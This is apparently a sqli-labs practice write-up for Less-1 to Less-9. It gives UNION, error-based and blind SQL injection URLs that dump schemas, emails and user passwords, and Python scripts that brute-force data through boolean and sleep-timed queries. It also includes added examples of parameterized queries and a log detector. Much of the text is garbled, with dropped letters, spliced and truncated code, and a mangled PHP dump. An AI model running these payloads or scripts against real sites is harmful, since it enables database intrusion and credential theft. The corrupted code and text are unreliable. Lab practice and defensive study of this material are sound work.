[Lab practice: sqli-labs] SQLi-LABS Page-1 (Basic Challenges)
GET section
Less-1: easy
1. Use order by to find that the queried table has three columns:
192.168.40.165/sqli-labs-master/Less-1/?id=1' order by 3--+
2. Use union select to get the database name: security
192.168.40.165/sqli-labs-master/Less-1/?id=-1' union select 1,database(),2--+
3. Use select group_concat(table_name) from information_schema.tables where table_schema=database() to get the table names: emails,referers,referers,uagents,users
192.168.40.165/sqli-labs-master/Less-1/?id=-1' union select 1,database(),(select group_concat(table_name) from information_schema.tables where table_schema=database())--+
4. Use select group_concat(column_name) from information_schema.columns where table_name='emails' to get the column names of the table: id,email_id
192.168.40.165/sqli-labs-master/Less-1/?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='emails'),database()--+
5. Use select group_concat(id,email_id) from emails to get the column values:
name:1Dumb@,2Angel@,3Dummy@,4secure@,5stupid@,6superman@,7batman@,8admin@dhakkan.c
192.168.40.165/sqli-labs-master/Less-1/?id=-1' union select 1,(select group_concat(id,email_id) from emails),database()--+
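The five steps above work only because the id parameter is pasted into the SQL string. As an added example (not from the original post), the following constructed in-memory sqlite3 table mirrors the lab's query next to a parameterized version and shows the step-1 ORDER BY probe and the UNION payload behaving differently against each; the table contents and the function names are this example's own assumptions.

```python
import sqlite3

# Constructed stand-in for the lab's users table (id, username, password) with the
# first three rows the walkthrough recovers; sample data, not the lab's database.
SAMPLE_USERS = [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"), (3, "Dummy", "p@ssword")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?,?,?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, user_id):
    """Mirror of the lab's query: the raw parameter is spliced into the statement,
    so a quote in the input ends the literal and the rest is parsed as SQL."""
    sql = "SELECT id, username, password FROM users WHERE id='%s' LIMIT 0,1" % user_id
    return conn.execute(sql).fetchone()


def lookup_safe(conn, user_id):
    """Hardened form: validate the expected type, then bind the value as a parameter.
    The driver sends it as data, so it can never change the statement's structure."""
    try:
        numeric_id = int(user_id)
    except (TypeError, ValueError):
        return None  # reject anything that is not a plain integer id
    sql = "SELECT id, username, password FROM users WHERE id=? LIMIT 0,1"
    return conn.execute(sql, (numeric_id,)).fetchone()


def order_by_probe_succeeds(conn, n):
    """The Less-1 step-1 probe: ORDER BY n parses while n <= column count and
    errors past it, which is how the attacker learned the table has 3 columns."""
    try:
        lookup_vulnerable(conn, "1' order by %d--" % n)
        return True
    except sqlite3.OperationalError:
        return False


def demo():
    """Run the same inputs through both lookups and collect the results."""
    conn = make_db()
    # The Less-1 step-5 shape: a UNION row carrying a subquery, tail commented out.
    payload = "-1' union select 1,(select group_concat(username) from users),3--"
    return {
        "normal_vulnerable": lookup_vulnerable(conn, "1"),
        "normal_safe": lookup_safe(conn, "1"),
        "payload_vulnerable": lookup_vulnerable(conn, payload),  # UNION row leaks all usernames
        "payload_safe": lookup_safe(conn, payload),              # rejected, no row
        "order_by_3": order_by_probe_succeeds(conn, 3),
        "order_by_4": order_by_probe_succeeds(conn, 4),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, "->", value)
```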
Less-2: easy
In Less-2 "and" strangely stopped working, which was confusing; fortunately "order by" still works.
Three columns:
192.168.40.165/sqli-labs-master/Less-2/?id=1 order by 3--+
Current database: security
192.168.40.165/sqli-labs-master/Less-2/?id=-1 union select 1,database(),3--+
Tables in security: _emails,_emails,_referers,_referers,_referers,_uagents,_uagents,_uagents,_uagents,_users,_users,_users
192.168.40.165/sqli-labs-master/Less-2/?id=-1 union select 1,database(),(select group_concat('_',table_name) from information_schema.tables where table_schema=database())--+
Columns of the users table: user_id,first_name,last_name,user,password,avatar,id,username,password
192.168.40.165/sqli-labs-master/Less-2/?id=-1 union select 1,database(),(select group_concat(column_name) from information_schema.columns where table_name='users')--+
Column values: DumbDumb,AngelinaI-kill-you,Dummyp@ssword,securecrappy,stupidstupidity,supermangenious,batmanmob!le,adminadmin,admin1admin1,admin2admin2,admin3admin3,dhakkandumbo,admin4admin4
192.168.40.165/sqli-labs-master/Less-2/?id=-1 union select 1,(select group_concat(username,password) from users),(select group_concat(column_name) from information_schema.columns where table_name='users')--+
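Every request in Less-1 and Less-2 leaves a distinctive query string in the web server's access log. The following added example (not part of the original post) scans constructed access-log lines for the payload shapes used throughout this walkthrough, including the boolean and time-based probes of the later levels, and flags sources that send many of them; the log lines, IP addresses and rule names are constructed for the example.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed combined-format log lines modelled on the requests in this walkthrough.
# Timestamps and client addresses are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [29/Sep/2019:13:20:01 +0800] "GET /sqli-labs-master/Less-1/?id=1 HTTP/1.1" 200 1420
10.0.0.9 - - [29/Sep/2019:13:21:10 +0800] "GET /sqli-labs-master/Less-1/?id=1%27%20order%20by%203--+ HTTP/1.1" 200 1420
10.0.0.9 - - [29/Sep/2019:13:21:15 +0800] "GET /sqli-labs-master/Less-1/?id=-1%27%20union%20select%201,database(),2--+ HTTP/1.1" 200 1433
10.0.0.9 - - [29/Sep/2019:13:22:02 +0800] "GET /sqli-labs-master/Less-5/?id=1%27%20and%20length(database())=7%23 HTTP/1.1" 200 1201
10.0.0.9 - - [29/Sep/2019:13:22:03 +0800] "GET /sqli-labs-master/Less-5/?id=1%27%20and%20length(database())=8%23 HTTP/1.1" 200 1256
10.0.0.9 - - [29/Sep/2019:13:23:40 +0800] "GET /sqli-labs-master/Less-9/?id=1%27%20and%20sleep(3)--+ HTTP/1.1" 200 1256
10.0.0.7 - - [29/Sep/2019:13:24:00 +0800] "GET /sqli-labs-master/Less-1/?id=2 HTTP/1.1" 200 1418
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d+) (?P<size>\d+)'
)

# Each rule names the injection shape it recognises, matched against the decoded query string.
RULES = [
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+")),
    ("schema_enum", re.compile(r"information_schema\.(tables|columns)")),
    ("boolean_blind", re.compile(r"\b(and|or)\s+(length|ascii|substr|substring|left)\(")),
    ("time_blind", re.compile(r"\b(sleep|benchmark)\(")),
    ("comment_tail", re.compile(r"(--\s|#)\s*$")),
]


def normalise_query(target):
    """Decode the query string the way the application sees it: %xx and '+' undone,
    whitespace collapsed, lower-cased so keyword case tricks do not matter."""
    query = urlsplit(target).query
    return re.sub(r"\s+", " ", unquote_plus(query)).lower()


def classify(target):
    """Names of the rules a request target matches; empty for a benign request."""
    query = normalise_query(target)
    return [name for name, rx in RULES if rx.search(query)]


def scan(log_text):
    """Parse each log line and return (ip, target, matched rules) for flagged requests."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = classify(m["target"])
        if hits:
            findings.append((m["ip"], m["target"], hits))
    return findings


def suspicious_sources(findings, threshold=3):
    """Clients with at least `threshold` flagged requests. Blind extraction needs one
    request per candidate character, so a real attempt shows up as a burst."""
    counts = {}
    for ip, _, _ in findings:
        counts[ip] = counts.get(ip, 0) + 1
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for ip, target, hits in found:
        print(ip, target, hits)
    print("sources over threshold:", suspicious_sources(found))
```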
Less-3: single quote + parenthesis closure
DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "/TR/xhtml1/DTD/"> <html xmlns="/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; chart=utf-8" /> <title>Less-3 Error Bad- String (with Twist) title> head> <body bgcolor="#000000"> <div style=" margin-top:60px;color:#FFF; font-size:23px; text-align:center">Welcome <font color="#FF0000"> Dhakkan font><br> <font size="3" color="#FFFF00"> <?php //including the Mysql connect parameters. include("../sql-connections/"); error_reporting(0); // take the variables if(ist($_GET['id'])) { $id=$_GET['id']; //logging the connection parameters to a file for analysis. $fp=fopen('','a'); fwrite($fp,'ID:'.$id."n"); fclo($fp); // connectivity $sql="SELECT * FROM urs WHERE id=('') LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result); if($row) { echo ""; echo 'Your Login name:'. $row['urname']; echo " echo 'Your Password:' .$row['password']; echo ""; } el { echo ''; print_r(mysql_error()); echo ""; } } el { echo "Plea input the ID as parameter with numeric value";} > font> div>br>br>br><center> <img src="../images/" />center> body> html> 源码 数据库:curity 192.168.40.165/sqli-labs-master/Less-3/ id=--1') union lect 1,2,databa() %23 数据表:emails,referers,uagents,urs 192.168.40.165/sqli-labs-master/Less-3/ id=--1') union lect 1,2,group_concat(table_name) from information_s where table_schema=databa() %23 列名:ur_id,first_name,last_name,ur,password,avatar,id,urname,password 192.168.40.165/sqli-labs-master/Less-3/ id=--1') union lect 1,2,group_concat(column_name) from information_s where table_name='urs' %23 字段值:Dumb,Angelina,Dummy,cure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4 192.168.40.165/sqli-labs-master/Less-3/ id=--1') union lect 1,2,group_concat(urname) from urs %23 less-4:双引号+括号闭合 双引号闭合:两条语句回显不同 id=1" and "0 id=1" and "1 括号闭合: u near 'union lect 1,2,3 #") LIMIT 0,1' at line 1 192.168.40.165/sqli-labs-master/Less-4/ id=1" union lect 1,2,3 %23 
192.168.40.165/sqli-labs-master/Less-4/ id=1") union lect 1,2,3 %23 数据库:curity 192.168.40.165/sqli-labs-master/Less-4/ id=-1") union lect 1,databa(),2 %23 数据表:emails,referers,uagents,urs 192.168.40.165/sqli-labs-master/Less-4/ id=-1") union lect 1,group_concat(table_name),3 from information_ where table_schema=databa()%23 列名:ur_id,first_name,last_name,ur,password,avatar,id,urname,password 192.168.40.165/sqli-labs-master/Less-4/ id=-1") union lect 1,group_concat(column_name),3 from information_s where table_name='urs'%23 字段值:Dumb,Angelina,Dummy,cure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4 192.168.40.165/sqli-labs-master/Less-4/ id=-1") union lect 1,group_concat(urname),3 from urs%23 less-5:盲注单引号闭合,看到有的师傅说报错也可以做,有时间试试 这⾥补⼀个函数,⼀开始使⽤substr来切割,发现怎么写也不⾏,然后⽤的是left() LEFT(str,len) 返回最左边的n个字符的字符串str,或NULL如果任何参数是NULL。 SQL> SELECT LEFT('foobarbar', 5); +---------------------------------------------------------+ | LEFT('foobarbar', 5) | +---------------------------------------------------------+ | fooba | +---------------------------------------------------------+ 1 row in t (0.00 c) //原⽂出⾃【易百教程】,商业转载请联系作者获得授权,⾮商业转载请保留原⽂链接:/sql/ ''' @Modify Time @Author ------------ ------- 2019/9/29 13:26 laoalo ''' import requests from lxml import etree import time tag = "You " d = "1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM," def databa_length(): ''' 数据库长度爆破 :return: 数据库长度 ''' global tag url = "192.168.40.165/sqli-labs-master/Less-5/?id=1' and length(databa())=" i = 0 while True: urls = url + str(i) + '%23' respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') print(urls) if htmlelmet: elment=htmlelmet[0] urls = "192.168.40.165/sqli-labs-master/Less-5/?id=1' and left(databa(),"+str(j)+")='"+databa+i+"'--+" respon = (url=urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') print(urls) if htmlelmet: elment = htmlelmet[0] if elment == tag: databa += i break return databa def table_name_no_ascii(length): ''' 
不⽤ascii的⽅法求表名,就直接遍历字典,等有空的时候完善 :param length: :return: ''' global d table="" for j in range(length+1): for i in d: urls="192.168.40.165/sqli-labs-master/Less-5/?id=1'and substr((lect table_name from information_ where table_schema=databa() limit 0,1),1,1)"+i+"--+" respon = (url=urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') print(urls) if htmlelmet: elment = htmlelmet[0] if elment == tag: table += i break return table def table_length(): ''' 计算当前数据库中所有的表的长 :return: 表长 ''' global tag i = 0 while True: urls = "192.168.40.165/sqli-labs-master/Less-5/?id=1' and length((lect group_concat(table_name) from information_s where table_schema=databa()))=" + str(i) + "--+ respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') print(urls) if htmlelmet: elment = htmlelmet[0] if elment == tag: return i el: i += 1 def table_name(length): ''' ascii法爆破数据表 :return: 表长 ''' global tag table="" for j in range(length+1): ''' i 的往上增,直到超了 ''' i = 0 while i<=122: urls = "192.168.40.165/sqli-labs-master/Less-5/?id=1' and ascii(substr((lect group_concat(table_name) from information_ where table_schema=databa()),"+str(j)+",1))< respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') print(urls) if htmlelmet: elment = htmlelmet[0] if elment == tag: break el: i+=10 ''' 此时i⾃减1开始定位名字 elment = htmlelmet[0] if elment == tag: return i el: i += 1 def column_name(length,table_name): ''' ascii法爆破字段 :return: 表长 ''' global tag table="" for j in range(length+1): ''' 10的往上增,直到超了 ''' i = 0 while i<=122: urls = "192.168.40.165/sqli-labs-master/Less-5/?id=1' and ascii(substr((lect group_concat(column_name) from information_s where table_name='"+table_name+"'),"+str(j)+ respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') print(urls) if htmlelmet: elment = htmlelmet[0] if elment == tag: break el: i+=10 ''' 此时i⾃减1开始定位名字 ''' print("开始⾃减") while i>0: urls = "192.168.40.165/sqli-labs-master/Less-5/?id=1' and ascii(substr((lect 
group_concat(column_name) from information_s where table_name='"+table_name+"'),"+str(j)+ respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') if htmlelmet: elment = htmlelmet[0] if elment == tag: table +=chr(i) print('表名=',table) break el: i-=1 return table def data_length(colums,table): ''' 得到数据的长度 :param colums: 字段名 :param table: 表名 :return: 数据的长度 ''' global tag i = 0 while i < 1000: urls = "192.168.40.165/sqli-labs-master/Less-5/?id=1' and length((lect group_concat("+colums+") from "+table+"))="+str(i) + "--+" respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') print(urls) if htmlelmet: elment = htmlelmet[0] if elment == tag: return i el: i += 1 def data_datail(length,colums,table): ''' 得到数据表中的值 :param length: 值得长度 :param colums: 查询的字段名 :param table: 查询的表名 :return: 字段值 ''' global d data = "" for j in range(1,length+1): for i in d: urls = "192.168.40.165/sqli-labs-master/Less-5/?id=1' and left((lect group_concat("+colums+") from "+table+"), "+str(j)+" )='"+data+i+"'--+" print(urls) respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') if htmlelmet: elment = htmlelmet[0] if elment == tag: data += i print(colums,'字段值=',data) break ''' @Modify Time @Author ------------ ------- 2019/9/29 13:26 laoalo ''' import requests from lxml import etree import time tag = "You " d = "1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM," def databa_length(): ''' 数据库长度爆破 :return: 数据库长度 ''' global tag url = '192.168.40.165/sqli-labs-master/Less-6/?id=1" and length(databa())=' i = 0 while True: urls = url + str(i) + '%23' respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') print(urls) if htmlelmet: elment=htmlelmet[0] if elment == tag: return i el: i += 1 def databa_name(length): ''' 爆破数据库名 :param length: 数据库长度 :return: 数据库名 ''' global d databa="" for j in range(length+1): for i in d: urls = '192.168.40.165/sqli-labs-master/Less-6/?id=1" and 
left(databa(),'+str(j)+')="'+databa+i+'"--+' respon = (url=urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') print(urls) if htmlelmet: elment = htmlelmet[0] if elment == tag: databa += i break return databa def table_name_no_ascii(length): ''' 不⽤ascii的⽅法求表名,就直接遍历字典,等有空的时候完善 :param length: :return: ''' global d table="" for j in range(length+1): for i in d: urls='192.168.40.165/sqli-labs-master/Less-6/?id=1" and substr((lect table_name from information_ where table_schema=databa() limit 0,1),1,1)'+i+'--+' respon = (url=urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') print(urls) if htmlelmet: elment = htmlelmet[0] ''' global tag i = 0 while True: urls = '192.168.40.165/sqli-labs-master/Less-6/?id=1" and length((lect group_concat(table_name) from information_s where table_schema=databa()))=' + str(i) + '--+' respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') print(urls) if htmlelmet: elment = htmlelmet[0] if elment == tag: return i el: i += 1 def table_name(length): ''' ascii法爆破数据表 :return: 表长 ''' global tag table = "" for j in range(length+1): ''' i 的往上增,直到超了 ''' i = 0 while i <= 122: urls = '192.168.40.165/sqli-labs-master/Less-6/?id=1" and ascii(substr((lect group_concat(table_name) from information_ where table_schema=databa()),'+str(j)+',1))< respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') if htmlelmet: elment = htmlelmet[0] if elment == tag: break el: i+=10 ''' 此时i⾃减1开始定位名字 ''' print("开始⾃减",end="") while i>0: urls = '192.168.40.165/sqli-labs-master/Less-6/?id=1" and ascii(substr((lect group_concat(table_name) from information_ where table_schema=databa()),'+str(j)+',1))= respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') if htmlelmet: elment = htmlelmet[0] if elment == tag: table +=chr(i) print('表名=',table) break el: i-=1 return table def colums_length(table_name): ''' 查询指定表的字段值 :param table_name: 表名 :return: ''' global tag i = 0 while i<1000: urls = 
'192.168.40.165/sqli-labs-master/Less-6/?id=1" and length((lect group_concat(column_name) from information_s where table_name="'+table_name+'"))=' + str(i) + respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') print(urls) if htmlelmet: elment = htmlelmet[0] respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') if htmlelmet: elment = htmlelmet[0] if elment == tag: table +=chr(i) print('表名=',table) break el: i-=1 return table def data_length(colums,table): ''' 得到数据的长度 :param colums: 字段名 :param table: 表名 :return: 数据的长度 ''' global tag i = 0 while i < 1000: urls = '192.168.40.165/sqli-labs-master/Less-6/?id=1" and length((lect group_concat('+colums+') from '+table+'))='+str(i) + '--+' respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') print(urls) if htmlelmet: elment = htmlelmet[0] if elment == tag: return i el: i += 1 def data_datail(length,colums,table): ''' 得到数据表中的值 :param length: 值得长度 :param colums: 查询的字段名 :param table: 查询的表名 :return: 字段值 ''' global d data = "" for j in range(1,length+1): for i in d: urls = '192.168.40.165/sqli-labs-master/Less-6/?id=1" and left((lect group_concat('+colums+') from '+table+'), '+str(j)+' )="'+data+i+'"--+' print(urls) respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') if htmlelmet: elment = htmlelmet[0] if elment == tag: data += i print(colums,'字段值=',data) break print(data) if __name__ == '__main__': # print(databa_length()) #8 # print(databa_name(8)) #curity # print(table_length()) #90 # print(table_name(90)) #emails,referers,uagents,urs # print(colums_length('emails')) #11 # print(column_name(11,'emails')) #id,email_id # print(data_length('id','emails')) #15 print(data_datail(15,'id','emails')) #id 字段值= 1,2,3,4,5,6,7,8 盲注脚本 Less-7:⽂件上传 id=0 union lect 1,@@datadir,@@badir MYSQL--+ id=1')) union lect 1,2,' PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "/TR/xhtml1/DTD/"> <?php //including the Mysql connect parameters. 
include("../sql-connections/"); error_reporting(0); // take the variables if(ist($_GET['id'])) { $id=$_GET['id']; //logging the connection parameters to a file for analysis. $fp=fopen('','a'); fwrite($fp,'ID:'.$id."n"); fclo($fp); // connectivity $sql="SELECT * FROM urs WHERE id=(('$id')) LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result); if($row) { echo ''; echo 'You '; echo " echo ""; } el { echo ''; echo 'You have an error in your SQL syntax'; //print_r(mysql_error()); echo ""; } } el { echo "Plea input the ID as parameter with numeric value";} > 源码 Your Login name:/var/lib/mysql/ Your Password:/usr/ 1、badir 参数 解释:该参数指定了安装 MySQL 的安装路径,填写全路径可以解决相对路径所造成的问题。 例如:badir="E:/dev/MySQL/MySQL Server 5.2/"表⽰我的 MySQL 安装在 E:/dev/MySQL/MySQL Server 5.2/ 路径下。 2、datadir 参数 解释:该参数指定了 MySQL 的数据库⽂件放在什么路径下。数据库⽂件即我们常说的 MySQL data ⽂件。 例如:datadir="E:/dev/MySQL/MySQL Server 5.2/Data/"则表⽰我的 MySQL 数据库⽂件放在 E:/dev/MySQL/MySQL Server 5.2/Data/ 路径下。 Less-8:单引号闭合的回显盲注 判断条件: 单引号: id=1' and '1 id=1' and '0 这次实验的是usrs表中的password,发现直接遍历会出现⼤⼩写不敏感的错误,⼜写了⼀个ascii版本,可以区分⼤⼩写,后来查资料才知道,有可能是sql不区分⼤⼩写导致 的 ''' @Modify Time @Author ------------ ------- 2019/10/4 10:21 laoalo ''' import requests from lxml import etree import time tag = "You " d = "1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM,-@!" 
def databa_length(): ''' 数据库长度爆破 :return: 数据库长度 ''' global tag url = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and length(databa())=" i = 0 while True: urls = url + str(i) + '%23' respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') print(urls) if htmlelmet: elment=htmlelmet[0] if elment == tag: return i el: i += 1 def databa_name(length): ''' 爆破数据库名 :param length: 数据库长度 :return: 数据库名 ''' global d databa="" for j in range(length+1): for i in d: urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and left(databa(),"+str(j)+")='"+databa+i+"'--+" respon = (url=urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') print(urls) if htmlelmet: elment = htmlelmet[0] if elment == tag: databa += i break return databa def table_name_no_ascii(length): ''' 不⽤ascii的⽅法求表名,就直接遍历字典,等有空的时候完善 :param length: :return: ''' global d table="" for j in range(length+1): for i in d: urls="192.168.40.165/sqli-labs-master/Less-8/?id=1'and substr((lect table_name from information_ where table_schema=databa() limit 0,1),1,1)"+i+"--+" respon = (url=urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') print(urls) if htmlelmet: elment = htmlelmet[0] if elment == tag: table += i break return table def table_length(): ''' 计算当前数据库中所有的表的长 :return: 表长 ''' global tag i = 0 while True: urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and length((lect group_concat(table_name) from information_s where table_schema=databa()))=" + str(i) + "--+" respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') print(urls) if htmlelmet: elment = htmlelmet[0] if elment == tag: return table def colums_length(table_name): ''' 查询指定表的字段值 :param table_name: 表名 :return: ''' global tag i = 0 while i<1000: urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and length((lect group_concat(column_name) from information_s where table_name='"+table_name+"'))=" + str(i) + "--+" respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') 
print(urls) if htmlelmet: elment = htmlelmet[0] if elment == tag: return i el: i += 1 def column_name(length,table_name): ''' ascii法爆破字段 :return: 表长 ''' global tag table="" for j in range(length+1): ''' 10的往上增,直到超了 ''' i = 0 while i<=122: urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and ascii(substr((lect group_concat(column_name) from information_s where table_name='"+table_name+"'),"+str(j)+",1))<" + str(i) + "--+" respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') print(urls) if htmlelmet: elment = htmlelmet[0] if elment == tag: break el: i+=10 ''' 此时i⾃减1开始定位名字 ''' print("开始⾃减") while i>0: urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and ascii(substr((lect group_concat(column_name) from information_s where table_name='"+table_name+"'),"+str(j)+",1))=" +str(i) + "--+" respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') if htmlelmet: elment = htmlelmet[0] if elment == tag: table +=chr(i) print('表名=',table) break el: i-=1 return table if __name__ == '__main__': # print(table_length()) #90 # print(table_name(90)) #emails,referers,uagents,urs # print(colums_length('urs')) #70 # print(column_name(70,'urs')) #ur_id,first_name,last_name,ur,password,avatar,id,urname,password,ur_id,first_name,last_name,ur,password,avatar,id,urname,password # print(data_length('password','urs'))#96 print(data_datail(96,'password','urs'))#dumb,i-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4dumb,i-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,ad 全⼩写版 ''' @Modify Time @Author ------------ ------- 2019/10/4 10:21 laoalo ''' import requests from lxml import etree import time tag = "You " d = "1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM,-@!" 
def databa_length(): ''' 数据库长度爆破 :return: 数据库长度 ''' global tag url = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and length(databa())=" i = 0 while True: urls = url + str(i) + '%23' respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') print(urls) if htmlelmet: elment=htmlelmet[0] if elment == tag: return i el: i += 1 def databa_name(length): ''' 爆破数据库名 :param length: 数据库长度 :return: 数据库名 ''' global d databa="" for j in range(length+1): for i in d: urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and left(databa(),"+str(j)+")='"+databa+i+"'--+" respon = (url=urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') print(urls) if htmlelmet: elment = htmlelmet[0] if elment == tag: databa += i break return databa def table_name_no_ascii(length): ''' 不⽤ascii的⽅法求表名,就直接遍历字典,等有空的时候完善 :param length: :return: ''' global d table="" for j in range(length+1): for i in d: urls="192.168.40.165/sqli-labs-master/Less-8/?id=1'and substr((lect table_name from information_ where table_schema=databa() limit 0,1),1,1)"+i+"--+" respon = (url=urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') print(urls) table="" for j in range(length+1): ''' i 的往上增,直到超了 ''' i = 0 while i<=122: urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and ascii(substr((lect group_concat(table_name) from information_ where table_schema=databa()),"+str(j)+",1))< respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') print(urls) if htmlelmet: elment = htmlelmet[0] if elment == tag: break el: i+=10 ''' 此时i⾃减1开始定位名字 ''' print("开始⾃减") while i>0: urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and ascii(substr((lect group_concat(table_name) from information_ where table_schema=databa()),"+str(j)+",1))= respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') if htmlelmet: elment = htmlelmet[0] if elment == tag: table +=chr(i) print('表名=',table) break el: i-=1 return table def colums_length(table_name): ''' 查询指定表的字段值 
:param table_name: 表名 :return: ''' global tag i = 0 while i<1000: urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and length((lect group_concat(column_name) from information_s where table_name='"+table_name+"'))=" + str(i) + respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') print(urls) if htmlelmet: elment = htmlelmet[0] if elment == tag: return i el: i += 1 def column_name(length,table_name): ''' ascii法爆破字段 :return: 表长 ''' global tag table="" for j in range(length+1): ''' 10的往上增,直到超了 ''' i = 0 global tag i = 0 while i < 1000: urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and length((lect group_concat("+colums+") from "+table+"))="+str(i) + "--+" respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') print(urls) if htmlelmet: elment = htmlelmet[0] if elment == tag: return i el: i += 1 def data_datail(length,colums,table): ''' 得到数据表中的值 :param length: 值得长度 :param colums: 查询的字段名 :param table: 查询的表名 :return: 字段值 ''' global d data = "" for j in range(1,length+1): for i in range(32,128): urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and ascii(substring((lect group_concat("+colums+") from "+table+"),"+str(j)+",1))="+str(i)+"--+" respon = (urls).text htmlelmet = (respon).xpath('//font[@size="5"]/text()') if htmlelmet: elment = htmlelmet[0] if elment == tag: data += chr(i) print(colums,'字段值=',data) break # print(data) if __name__ == '__main__': # print(table_length()) # print(table_name(90)) # print(colums_length('urs')) # print(column_name(70,'urs')) # print(data_length('password','urs')) print(data_datail(96,'password','urs')) 正确版 Less-9:时间盲注+单引号闭合 单引号+时间盲注: id=1' and sleep(3)--+ 1 ''' 2 @Modify Time @Author 3 ------------ ------- 4 2019/10/2 20:04 laoalo 5 ''' 6 # -*- coding:utf-8 -*- 7 import requests 8 import time 9 10 url = "192.168.40.165/sqli-labs-master/Less-9/?id=1'" 11 def databa_length(): 12 global url 13 for i in range(1,10000): 14 sql = url + " and if((lect 
length(databa()))>"+str(i)+",0,sleep(3)) +--+" 15 s_time = () 16 respon = (url=sql,timeout=3) 17 e_time = () 18 print(sql) 19 if(e_time-s_time) > 3: 20 print("数据库长:",i) 21 break 22 def databa_name(databa_length): 23 global url 24 sql = url + " and if(ascii(substr((lect databa()),{num},1))>{asc},0,sleep(3)) +--+" 25 db_name = '' 26 for num in range(1, databa_length+1): 27 for asc in range(ord('a'), ord('z') + 1): 28 s_time = () 29 ((num=num, asc=asc)) 30 e_time = () 31 if (e_time - s_time) > 3: 32 db_name += chr(asc) 33 print("数据库名:",db_name) 34 break 35 def table_length(databa_name): 36 global url 37 for i in range(1, 10000): 38 sql = url + " and if((lect length((lect group_concat(table_name) from information_ where table_schema='"+databa_name+"')))>" + str(i) + ",0,sleep(3)) +--+" 39 s_time = () 40 respon = (url=sql, timeout=3) 41 e_time = () 42 print(sql) 43 if (e_time - s_time) > 3: 44 print(databa_name,"中的所有数据表名长:", i) 45 break 46 def table_name(table_length,databa_name): 47 global url 48 sql = url + " and if(ascii(substr((lect group_concat(table_name parator '@') from information_ where table_schema='"+databa_name+"'),{num},1))>{asc},0,sleep(3)) +--+" 49 table_name = '' 